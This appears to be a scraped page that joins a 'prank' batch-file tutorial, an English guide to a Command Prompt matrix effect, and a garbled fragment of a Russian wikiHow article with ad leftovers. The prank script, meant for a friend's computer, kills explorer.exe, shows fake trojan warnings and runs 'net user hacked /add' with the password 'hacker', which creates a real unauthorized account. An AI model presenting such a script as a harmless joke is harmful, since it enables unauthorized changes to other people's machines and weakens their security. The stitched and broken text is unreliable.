Hello guys today m gonna teach you how you easily can make a matrix effect in cmd and can prank in your friends computer Its very easy to do.Just follow my steps and enjoy.
First of all open notepad and copy the given code in notepad and save it as batch file i.e example.bat
CODES
@echo off
taskkill /f /im explorer.exe
color 2
:prank
pause
echo malicous malware has been detected on your computer…
pause
echo attempting to contact your local windows firewall…
pause
echo access was denied…try again
pause
echo TROJAN INSTALLED
net user hacked /add
net user hacked hacker
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
pause
echo lmao you just got pranked :p
pause
:end prank
Introduction: Matrix Command Prompt (WITH COLOR!!)
Many of you all know the cool trick with command prompt that makes it look like matrix. You probably didn’t know you can change the colors.
In the code it says «color 0a».
I learned this from minecraft… &a = green and &0 = black. So I changed «a» to «b» and it changed the numbers blue. I also changed «0» to «f» and it made the background white.
In the instructions I will leave the color codes for the background and numbers along with the matrix code
Step 1: The Setup
1. Go to notepad
You can do this by pressing the windows logo and r at the same time.
Step 2: The Code
Here is the code
Copy between the lines
———————————
@echo off
color 0a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top
———————————
Make sure on notepads «%random%» is on one line and not two
Now on line two it says «color 0a»
I’m going to show colors you can change it to
A green
B blue
F white
C pinkish red
E light yellow
D purple pinkish
1 dark blue
2 dark green
3 cyan blue
4 red
5 dark violet
6 yellow
7 light grey
8 dark grey
9 bluefish grey :/
0 black
So. Color 0a change 0 to any color for background ad for colors numbers
Step 3: Saving the Notepad
Now save it
On the top right corner it says «file»
Click it then it says «save as»
Save it as «example.bat»
Example means… Well… Example
.bat is important meaning «batch»
Step 4: Open It!!
Enjoy!!!
Загрузить PDF
Загрузить PDF
Многим людям нравится визуальный эффект в виде «осыпающихся» символов в фильме «Матрица». В этой статье мы расскажем вам, как создать такой визуальный эффект с помощью командной строки.
-
-
- echo %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random%.
- goto start
- echo %random% %random% %random% %random% %random% %random% %random%
-
Картинка с сайта: ru.wikihow.com
Сохраните файл как пакетный файл «Matrix.bat».
Реклама
Советы
- Чтобы изменить цвета, введите, к примеру, «color A2» или «color 2A» и вы получите светло-зеленые символы на зеленом фоне. Используйте любую комбинацию цифр от 0 до 9 и букв от A до F, чтобы изменить цвет фона и символов.
Реклама
Предупреждения
- Не нажимайте клавишу ESC, чтобы закрыть полноэкранный режим — для этого нажмите ALT + Enter.
- Также закрыть полноэкранный режим можно с помощью сочетания клавиш CTRL + SHIFT + ESC (Windows 7) или CTRL + ALT + DEL (Windows XP).
Реклама
Что вам понадобится
- Компьютер под управлением Windows
- Программа «Блокнот»
Об этой статье
Эту страницу просматривали 215 016 раз.